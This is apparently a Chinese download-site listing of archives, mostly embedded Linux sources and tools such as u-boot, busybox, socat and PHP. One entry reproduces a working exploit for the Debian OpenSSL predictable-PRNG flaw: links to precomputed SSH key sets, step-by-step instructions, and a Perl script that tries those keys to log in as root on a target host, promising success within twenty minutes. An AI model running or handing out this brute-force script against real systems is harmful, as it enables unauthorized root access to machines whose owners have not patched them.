嵌入式linux bootloader .tar.bz2 源码包
2022-12-28 15:55:28 157KB 嵌入式linux bootloader .tar.bz2
1
socat1.7.3.4 交叉编译文件 ,交叉编译工具使用的是arm-linux-gnueabihf-gcc 4.9.支持imx6系列,直接可以运行的。
2022-12-24 21:29:45 157KB socat
1
google protobuf 2.6.0 国内访问google不容易
2022-12-23 15:11:09 1.93MB protobuf
1
Android Linux Input输入子系统 evnet测试工具
2022-12-21 17:02:44 81KB linux inputevent
1
u-boot 三星 s5pv210芯片
2022-12-11 18:31:28 8.08MB u-boot源码
1
busybox-1.00.tar.bz2,一款嵌入式开发必用的小工具,实用,经典
2022-12-08 09:32:26 1.07MB busybox-1.00.tar.bz2 嵌入式开发 ubuntu linux
1
gcc4.8.2 编译gcc4.8必备的依赖库 gmp-4.3.2.tar.bz2 mpfr-2.4.2.tar.bz2 mpc-0.8.1.tar.gz
2022-12-07 21:10:50 85.37MB gmp mpfr mpc gcc4.8
1
PHP (php-5.2.9.tar.bz2) Linux版本源码,可编译安装 截止2009年6月17日最新版
2022-12-07 20:00:31 9.73MB PHP php-5.2.9
1
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit 解开Debian OpenSSL内的ssh钥匙只有65.536可能性,导致唯一的熵是引起钥匙的过程的Pid. 这导致以下perl脚本程序可以使用与暴力的预先计算好的ssh钥匙。如果钥匙在一个非被修补的debian或其他系统指南被安装配置,它就会运作。 在一个未修补的系统中,不需要Debian,做以下工作: keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/ 1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2 http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2 2. 提取它对应目录 3. 输入/root/.ssh/authorized_keys与2048位的SSH RSA钥匙,引起在Upatched Debian (这是这盘剥将增殖比的钥匙 eak) 4. 运行perl脚本程序并且给它提取bzip2的位置. CODE: #!/usr/bin/perl my $keysPerConnect = 6; unless ($ARGV[1]) { print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n"; print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n"; print "By hack01[at]live[dot]cn\n"; exit 0; } chdir($ARGV[0]); opendir(A, $ARGV[0]) || die("opendir"); while ($_ = readdir(A)) { chomp; next unless m,^\d+$,; push(@a, $_); if (scalar(@a) > $keysPerConnect) { system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i ".$_ } @a)." ".$ARGV[1]); @a = (); } } 5. 在几分钟(少于20分钟)以后享受胜利结果吧!
2022-12-05 15:02:46 47.9MB 漏洞复现
1
Firefox-102-latest-x86_64.tar.bz2
2022-11-26 14:21:28 73.88MB Firefox